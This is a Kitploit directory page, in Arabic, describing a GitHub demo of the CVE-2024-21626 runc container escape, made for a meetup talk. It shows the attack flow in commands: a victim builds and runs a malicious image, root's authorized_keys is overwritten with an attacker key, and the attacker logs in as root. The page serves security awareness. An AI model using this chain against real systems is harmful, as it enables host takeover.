Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-21626-demo — عرض توضيحي لـLT في لقاء Container Runtime #5 | Kitploit
أدوات/GitHubGitHub/laysakura/cve-2024-21626-demo
أمن الحاوياتتحليل الثغرات الأمنيةالاستغلالالتعلم والتعليمالهروب من الحاويةمختبرات وتدريب عملي
GitHublaysakura/cve-2024-21626-demo

CVE-2024-21626-demo

عرض توضيحي لـLT في لقاء Container Runtime #5

عرض المستودع
3منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-21626-demo

عرض توضيحي لـ LT في لقاء Container Runtime Meetup #5.

الغرض هو نشر الوعي حول مخاطر الهجوم بناءً على المعلومات العامة، والاستخدام الضار ممنوع منعاً باتاً.

الشريحة

Container Runtime Meetup #5 هل تثق حقًا في تلك الصورة؟ استحواذ على صلاحية الجذر للمضيف باستخدام CVE-2024-21626

تسجيل الدخول إلى victim-server

الجهاز المسجل باسم victim-server في ssh_config للحاسوب المحمول التوضيحي.

root@kitploit:~
ssh victim-server

معلومات الإصدار كشرط مسبق للتعرض للهجوم:

root@kitploit:~
ubuntu@victim-server:$ docker --version
Docker version 20.10.25+dfsg1, build b82b9f3

ubuntu@victim-server:$ runc --version
runc version 1.1.10+ds1
commit: 1.1.10+ds1-1
spec: 1.1.0
go: go1.21.3
libseccomp: 2.5.4

تسجيل الدخول إلى attacker-server

بالمثل

root@kitploit:~
ssh attacker-server

السيناريو

1. [victim-server] الحصول الخطأ على صورة Docker ضارة وبناؤها وتشغيلها

root@kitploit:~
ubuntu@victim-server:~$ git clone [email protected]:laysakura/CVE-2024-21626-demo.git
ubuntu@victim-server:~$ cd CVE-2024-21626-demo/
ubuntu@victim-server:~/CVE-2024-21626-demo$ docker build -t myimage .
ubuntu@victim-server:~/CVE-2024-21626-demo$ docker run -it myimage

2. [victim-server] يتم استبدال /root/.ssh/authorized_keys بمفتاح المهاجم العام دون قصد

في الأصل غير مقصود لذا لا يتم فعل شيء هنا، ولكن يتم عرض أمر للتحقق من الحالة.

root@kitploit:~
ubuntu@victim-server:~$ sudo cat /root/.ssh/authorized_keys
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKPHHGSytV6bL1ryaEKE9XNWN23piXdzsI3Rzxe20IF6 ubuntu@attacker-server

3. [attacker-server] تسجيل الدخول كجذر إلى victim-server

root@kitploit:~
attacker@attacker-server:~$ ssh -i .ssh/id_ed25519 root@victim-server

root@victim-server:~# id
uid=0(root) gid=0(root) groups=0(root)

المراجع

  • https://github.com/opencontainers/runc/security/advisories/GHSA-xr7r-f8xq-vfvv
  • https://github.com/NitroCao/CVE-2024-21626
تنزيل الأداة